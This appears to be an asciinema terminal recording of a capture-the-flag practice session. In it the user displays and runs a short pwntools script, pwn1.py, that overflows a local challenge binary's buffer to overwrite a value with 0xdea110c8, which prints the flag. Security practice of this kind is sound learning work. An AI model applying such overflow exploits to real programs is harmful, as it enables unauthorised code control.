[160.673121, "o", "\u001b[39mo\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b"]
[160.677338, "o", "\u001b[38;2;153;153;153mbjectiv\u001b[39m\u001b[38;2;153;153;153me\\ I\\\u001b[39m\u001b[38;2;153;153;153m installed.txt\u001b[39m\u001b[26D"]
[160.851609, "o", "\u001b[39mw\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[25D"]
[161.379367, "o", "\b \b"]
[161.383753, "o", "\u001b[38;2;153;153;153mbjectiv\u001b[39m\u001b[38;2;153;153;153me\\ I\\\u001b[39m\u001b[38;2;153;153;153m installed.txt\u001b[39m\u001b[26D"]
[161.568132, "o", "\b \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[27D"]
[161.57197, "o", "\u001b[38;2;153;153;153mpwn1.py\u001b[39m\b\b\b\b\b\b\b"]
[161.828697, "o", "\u001b[39mp"]
[161.832774, "o", "\b\u001b[1mp\u001b[0m"]
[161.942577, "o", "\b\u001b[1mp\u001b[39m\u001b[1mw\u001b[0m"]
[162.421267, "o", "\b\b\u001b[0mp\u001b[0mw\u001b[39mn\u001b[39m1"]
[162.424635, "o", "\b\b\b\b\u001b[1mp\u001b[1mw\u001b[1mn\u001b[1m1\u001b[0m"]
[163.258805, "o", "\u001b[3C"]
[163.262219, "o", "\b\b\b\b\u001b[1m1\u001b[1m\u001b[38;2;153;153;153m.\u001b[1m\u001b[38;2;153;153;153mp\u001b[1m\u001b[38;2;153;153;153my\u001b[0m\u001b[39m"]
[163.997821, "o", "\u001b[?1l\u001b>"]
[163.997936, "o", "\u001b[?2004l"]
[164.000974, "o", "\r\r\n"]
[164.003922, "o", "from pwn import *\r\npad = ''\r\npad = b\"A\" * 43\r\npad += p32(0xdea110c8)\r\n\r\np = process(\"./pwn1\")\r\np.recvuntil(b\"What... is your name?\")\r\np.sendline(b\"Sir Lancelot of Camelot\")\r\np.recvuntil(b\"What... is your quest?\")\r\np.sendline(b\"To seek the Holy Grail.\")\r\np.recvuntil(b\"What... is my secret?\")\r\np.sendline(pad)\r\n\r\np.interactive()\r\n"]
[164.004288, "o", "                                                                                                                                           \r\r"]
[164.004479, "o", "\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u0007\r\n"]
[164.028351, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[164.028541, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[170.736982, "o", "p"]
[170.742451, "o", "\b\u001b[1mp\u001b[0m"]
[170.742845, "o", "\b\u001b[1mp\u001b[0m\u001b[38;2;153;153;153mwn checksec pwn1\u001b[39m\u001b[16D"]
[170.94377, "o", "\b\u001b[1mp\u001b[39m\u001b[1my\u001b[0m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[15D"]
[170.950176, "o", "\b\b\u001b[0m\u001b[4mp\u001b[0m\u001b[4my\u001b[24m"]
[170.95046, "o", "\u001b[38;2;153;153;153mthon pwn1.py\u001b[39m\u001b[12D"]
[171.110642, "o", "\b\b\u001b[4mp\u001b[4my\u001b[39m\u001b[4mh\u001b[24m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[11D"]
[171.11977, "o", "\b\u001b[4mh\u001b[4mt\u001b[24m"]
[171.261986, "o", "\b\u001b[4mt\u001b[4mo\u001b[24m"]
[171.408359, "o", "\b\u001b[4mo\u001b[4mn\u001b[24m"]
[171.622444, "o", "\b\u001b[4mn\u001b[4m \u001b[24m"]
[171.626491, "o", "\b\b\u001b[4mn\u001b[24m\u001b[24m "]
[171.957207, "o", "\b"]
[172.12933, "o", "\b\b\u001b[4mo\u001b[24m\u001b[24m \b"]
[172.310941, "o", "\b\b\u001b[4mt\u001b[24m\u001b[24m \b"]
[172.45794, "o", "\b\b\u001b[4mh\u001b[24m\u001b[24m \b"]
[172.69941, "o", "\b\b\b\u001b[4mp\u001b[4my\u001b[24m\u001b[24m \b"]
[172.702824, "o", "\u001b[38;2;153;153;153mthon pwn1.py\u001b[39m\u001b[12D"]
[173.015418, "o", "\b\b\u001b[4mp\u001b[24m\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[13D"]
[173.018756, "o", "\b\u001b[24m\u001b[1mp\u001b[0m"]
[173.019071, "o", "\b\u001b[1mp\u001b[0m\u001b[38;2;153;153;153mwn checksec \u001b[39m\u001b[38;2;153;153;153mpwn1\u001b[39m\u001b[16D"]
[173.176126, "o", "\b\u001b[0m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[17D"]
[173.582388, "o", "c"]
[173.589094, "o", "\b\u001b[4mc\u001b[24m"]
[173.589705, "o", "\b\u001b[4mc\u001b[24m\u001b[38;2;153;153;153mat pwn1.py\u001b[39m\u001b[10D"]
[173.781939, "o", "\b\u001b[4mc\u001b[39m\u001b[4ma\u001b[24m"]
[173.997986, "o", "\b\b\u001b[4mc\u001b[4ma\u001b[39m\u001b[4mt\u001b[24m"]
[174.000533, "o", "\b\b\b\u001b[24m\u001b[36mc\u001b[24m\u001b[36ma\u001b[24m\u001b[36mt\u001b[39m"]
[174.097414, "o", "\b\u001b[36mt\u001b[36m \u001b[39m"]
[174.10016, "o", "\b\b\u001b[36mt\u001b[39m\u001b[39m "]
[174.256448, "o", "\u001b[39mf\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b"]
[174.260846, "o", "\b\u001b[1mf\u001b[0m"]
[174.26135, "o", "\u001b[38;2;153;153;153more-obs\u001b[39m\u001b[38;2;153;153;153muct.md\u001b[39m\u001b[13D"]
[174.311385, "o", "\b\u001b[1mf\u001b[39m\u001b[1ml\u001b[0m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[12D"]
[174.315943, "o", "\u001b[38;2;153;153;153mag.txt\u001b[39m\b\b\b\b\b\b"]
[174.476043, "o", "\b\u001b[1ml\u001b[39m\u001b[1ma\u001b[0m"]
[174.577645, "o", "\b\u001b[1ma\u001b[39m\u001b[1mg\u001b[0m"]
[174.963714, "o", "\b\u001b[1mg\u001b[39m\u001b[1m.\u001b[39m\u001b[1mt\u001b[39m\u001b[1mx\u001b[39m\u001b[1mt\u001b[0m\u001b[1m \u001b[0m"]
[175.342772, "o", "\b\u001b[0m \b"]
[175.347628, "o", "\u001b[?1l\u001b>\u001b[?2004l"]
[175.350985, "o", "\r\r\n"]
[175.353746, "o", "ctf{Got_the_flag}\r\n"]
[175.354146, "o", "                                                                                                                                           \r\r"]
[175.354311, "o", "\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u0007"]
[175.354374, "o", "\r\n"]
[175.380398, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K\u001b[?1h\u001b=\u001b[?2004h"]
[176.378209, "o", "p"]
[176.383832, "o", "\b\u001b[1mp\u001b[0m"]
[176.384178, "o", "\b\u001b[1mp\u001b[0m\u001b[38;2;153;153;153mwn checksec pwn1\u001b[39m\u001b[16D"]
[176.660539, "o", "\b\u001b[1mp\u001b[39m\u001b[1my\u001b[0m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[15D"]
[176.667573, "o", "\b\b\u001b[0m\u001b[4mp\u001b[0m\u001b[4my\u001b[24m"]
[176.6683, "o", "\u001b[38;2;153;153;153mthon pwn1.py\u001b[39m\u001b[12D"]
[176.824847, "o", "\b\b\u001b[4mp\u001b[4my\u001b[39m\u001b[4mt\u001b[24m"]
[176.905625, "o", "\b\u001b[4mt\u001b[39m\u001b[4mh\u001b[24m"]
[176.996363, "o", "\b\u001b[4mh\u001b[39m\u001b[4mo\u001b[24m"]
[177.1394, "o", "\b\u001b[4mo\u001b[39m\u001b[4mn\u001b[24m"]
[177.142065, "o", "\b\b\b\b\b\b\u001b[24m\u001b[36mp\u001b[24m\u001b[36my\u001b[24m\u001b[36mt\u001b[24m\u001b[36mh\u001b[24m\u001b[36mo\u001b[24m\u001b[36mn\u001b[39m"]
[177.361471, "o", "\b\u001b[36mn\u001b[36m \u001b[39m"]
[177.364309, "o", "\b\b\u001b[36mn\u001b[39m\u001b[39m "]
[177.666835, "o", "\u001b[39mp"]
[177.670779, "o", "\b\u001b[1mp\u001b[0m"]
[177.845017, "o", "\b\u001b[1mp\u001b[39m\u001b[1mw\u001b[0m"]
[178.223259, "o", "\u001b[5C"]
[178.227325, "o", "\b\b\b\b\b\b\u001b[1mw\u001b[1m\u001b[38;2;153;153;153mn\u001b[1m\u001b[38;2;153;153;153m1\u001b[1m\u001b[38;2;153;153;153m.\u001b[1m\u001b[38;2;153;153;153mp\u001b[1m\u001b[38;2;153;153;153my\u001b[0m\u001b[39m"]
[178.950319, "o", "\u001b[?1l\u001b>"]
[178.950423, "o", "\u001b[?2004l"]
[178.953595, "o", "\r\r\n"]
[179.259006, "o", "[x] Starting local process './pwn1'\r\n"]
[179.259511, "o", "\u001b[A[\u001b[1m\u001b[34m◢\u001b[m] \r\n"]
[179.268139, "o", "\u001b[5G\u001b[AStarting local process './pwn1': pid 83057\r\n"]
[179.268574, "o", "\u001b[A[\u001b[1m\u001b[32m+\u001b[m] \r\n"]
[179.271073, "o", "[\u001b[1m\u001b[34m*\u001b[m] Switching to interactive mode\r\n"]
[179.271829, "o", "\r\n"]
[179.272206, "o", "\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m\u001b[J"]
[179.272352, "o", "\u001b[?25l\u001b[?1h\u001b="]
[179.272815, "o", "\r\u001b[J[\u001b[1m\u001b[34m*\u001b[m] Process './pwn1' stopped with exit code 0 (pid 83057)\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[179.273033, "o", "\r\u001b[JRight. Off you go.\r\nctf{Got_the_flag}\r\n\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[179.273404, "o", "\r"]
[179.273513, "o", "\u001b[J[\u001b[1m\u001b[34m*\u001b[m] Got EOF while reading in interactive\r\n\u001b[1m\u001b[31m$\u001b[m \u001b[7m \u001b[m"]
[181.247538, "o", "\u001b[3Ge\u001b[7m \u001b[m\u001b[J"]
[181.282744, "o", "\u001b[3Gex\u001b[7m \u001b[m\u001b[J"]
[181.871387, "o", "\u001b[3Gexi\u001b[7m \u001b[m\u001b[J"]
[182.052169, "o", "\u001b[3Gexit\u001b[7m \u001b[m\u001b[J"]
[182.174308, "o", "\u001b[3G\u001b[Kexit\r\n\u001b[J"]
[182.174806, "o", "[\u001b[1m\u001b[34m*\u001b[m] Got EOF while sending in interactive\r\n"]
[182.175113, "o", "\u001b[?12l\u001b[?25h\u001b[?1l\u001b>"]
[182.278544, "o", "                                                                                                                                           \r\r"]
[182.278881, "o", "\u001b]0;himanshu@Kaaammui: ~/Desktop/Github/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u0007\r\n"]
[182.30387, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mhimanshu㉿Kaaammui\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/…/CTF-Practice/pwn/01.BOF/tamu19-pwn1\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[182.304034, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[187.691879, "o", "a"]
[187.697629, "o", "\b\u001b[4ma\u001b[24m"]
[187.698052, "o", "\b\u001b[4ma\u001b[24m\u001b[38;2;153;153;153msciinema stop\u001b[39m\u001b[13D"]
[187.891168, "o", "\b\u001b[4ma\u001b[39m\u001b[4ms\u001b[24m"]
[187.893693, "o", "\b\b\u001b[24m\u001b[36ma\u001b[24m\u001b[36ms\u001b[39m"]
[188.049529, "o", "\b\b\u001b[36ma\u001b[36ms\u001b[36mc\u001b[39m"]
[188.056313, "o", "\b\b\b\u001b[39m\u001b[4ma\u001b[39m\u001b[4ms\u001b[39m\u001b[4mc\u001b[24m"]
[188.209632, "o", "\b\u001b[4mc\u001b[39m\u001b[4mi\u001b[24m"]
[188.390095, "o", "\b\u001b[4mi\u001b[39m\u001b[4mi\u001b[24m"]
[188.598117, "o", "\b\u001b[4mi\u001b[39m\u001b[4mn\u001b[24m"]
[188.80022, "o", "\b\u001b[4mn\u001b[39m\u001b[4me\u001b[24m"]
[188.884741, "o", "\b\u001b[4me\u001b[39m\u001b[4mm\u001b[24m"]
[189.026567, "o", "\b\u001b[4mm\u001b[39m\u001b[4ma\u001b[24m"]
[189.029709, "o", "\u001b[9D\u001b[24m\u001b[36ma\u001b[24m\u001b[36ms\u001b[24m\u001b[36mc\u001b[24m\u001b[36mi\u001b[24m\u001b[36mi\u001b[24m\u001b[36mn\u001b[24m\u001b[36me\u001b[24m\u001b[36mm\u001b[24m\u001b[36ma\u001b[39m"]
[189.156449, "o", "\b\u001b[36ma\u001b[36m \u001b[39m"]
[189.159313, "o", "\b\b\u001b[36ma\u001b[39m\u001b[39m "]
[189.660772, "o", "\u001b[39ms"]
[190.121675, "o", "\b \u001b[39m \u001b[39m \u001b[39m \b\b\b\b"]
[190.125365, "o", "\u001b[38;2;153;153;153msto\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\b\b\b\b"]
[190.622332, "o", "\u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b"]
[190.626061, "o", "\u001b[38;2;153;153;153m st\u001b[39m\u001b[38;2;153;153;153mo\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\b\b\b\b\b"]
[190.653855, "o", "\b\b\u001b[36mm\u001b[39m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b"]
[190.657432, "o", "\u001b[8D\u001b[39m\u001b[4ma\u001b[39m\u001b[4ms\u001b[39m\u001b[4mc\u001b[39m\u001b[4mi\u001b[39m\u001b[4mi\u001b[39m\u001b[4mn\u001b[39m\u001b[4me\u001b[39m\u001b[4mm\u001b[24m"]
[190.657788, "o", "\u001b[38;2;153;153;153ma s\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\u001b[38;2;153;153;153mo\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\b\b\b\b\b\b"]
[190.683754, "o", "\b\b\u001b[4me\u001b[24m\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \b\b\b\b\b\b\b"]
[190.687457, "o", "\u001b[38;2;153;153;153mma \u001b[39m\u001b[38;2;153;153;153ms\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\u001b[38;2;153;153;153mo\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\b\b\b\b\b\b\b"]
[190.714414, "o", "\b\b\u001b[4mn\u001b[24m\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[8D"]
[190.717771, "o", "\u001b[38;2;153;153;153mema\u001b[39m\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153ms\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\u001b[38;2;153;153;153mo\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\u001b[8D"]
[190.744203, "o", "\b\b\u001b[4mi\u001b[24m\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[9D"]
[190.747693, "o", "\u001b[38;2;153;153;153mnem\u001b[39m\u001b[38;2;153;153;153ma\u001b[39m\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153ms\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\u001b[38;2;153;153;153mo\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\u001b[9D"]
[190.774434, "o", "\b\b\u001b[4mi\u001b[24m\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[10D"]
[190.778009, "o", "\u001b[38;2;153;153;153mine\u001b[39m\u001b[38;2;153;153;153mm\u001b[39m\u001b[38;2;153;153;153ma\u001b[39m\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153ms\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\u001b[38;2;153;153;153mo\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\u001b[10D"]
[190.804041, "o", "\b\b\u001b[4mc\u001b[24m\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[11D"]
[190.807562, "o", "\u001b[38;2;153;153;153miin\u001b[39m\u001b[38;2;153;153;153me\u001b[39m\u001b[38;2;153;153;153mm\u001b[39m\u001b[38;2;153;153;153ma\u001b[39m\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153ms\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\u001b[38;2;153;153;153mo\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\u001b[11D"]
[190.834447, "o", "\b\b\b\u001b[4ma\u001b[4ms\u001b[24m\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[12D"]
[190.838336, "o", "\b\b\u001b[24m\u001b[36ma\u001b[24m\u001b[36ms\u001b[39m"]
[190.838634, "o", "\u001b[38;2;153;153;153mcii\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153me\u001b[39m\u001b[38;2;153;153;153mm\u001b[39m\u001b[38;2;153;153;153ma\u001b[39m\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153ms\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\u001b[38;2;153;153;153mo\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\u001b[12D"]
[190.863374, "o", "\b\b\u001b[36ma\u001b[39m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[13D"]
[190.866673, "o", "\b\u001b[39m\u001b[4ma\u001b[24m"]
[190.867, "o", "\b\u001b[4ma\u001b[24m\u001b[38;2;153;153;153msci\u001b[39m\u001b[38;2;153;153;153mi\u001b[39m\u001b[38;2;153;153;153mn\u001b[39m\u001b[38;2;153;153;153me\u001b[39m\u001b[38;2;153;153;153mm\u001b[39m\u001b[38;2;153;153;153ma\u001b[39m\u001b[38;2;153;153;153m \u001b[39m\u001b[38;2;153;153;153ms\u001b[39m\u001b[38;2;153;153;153mt\u001b[39m\u001b[38;2;153;153;153mo\u001b[39m\u001b[38;2;153;153;153mp\u001b[39m\u001b[13D"]
[190.893205, "o", "\b\u001b[24m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[14D"]
[191.139827, "o", "e"]
[191.146123, "o", "\b\u001b[4me\u001b[24m"]
[191.146433, "o", "\b\u001b[4me\u001b[24m\u001b[38;2;153;153;153mxit\u001b[39m\b\b\b"]
[191.214031, "o", "\b\u001b[4me\u001b[39m\u001b[4mx\u001b[24m"]
[191.216831, "o", "\b\b\u001b[24m\u001b[36me\u001b[24m\u001b[36mx\u001b[39m"]
[191.352967, "o", "\b\b\u001b[36me\u001b[36mx\u001b[36mi\u001b[39m"]
[191.359801, "o", "\b\b\b\u001b[39m\u001b[4me\u001b[39m\u001b[4mx\u001b[39m\u001b[4mi\u001b[24m"]
[191.410409, "o", "\b\u001b[4mi\u001b[39m\u001b[4mt\u001b[24m"]
[191.413196, "o", "\b\b\b\b\u001b[24m\u001b[36me\u001b[24m\u001b[36mx\u001b[24m\u001b[36mi\u001b[24m\u001b[36mt\u001b[39m"]
[191.968725, "o", "\u001b[?1l\u001b>"]
[191.96888, "o", "\u001b[?2004l"]
[191.971139, "o", "\r\r\n"]
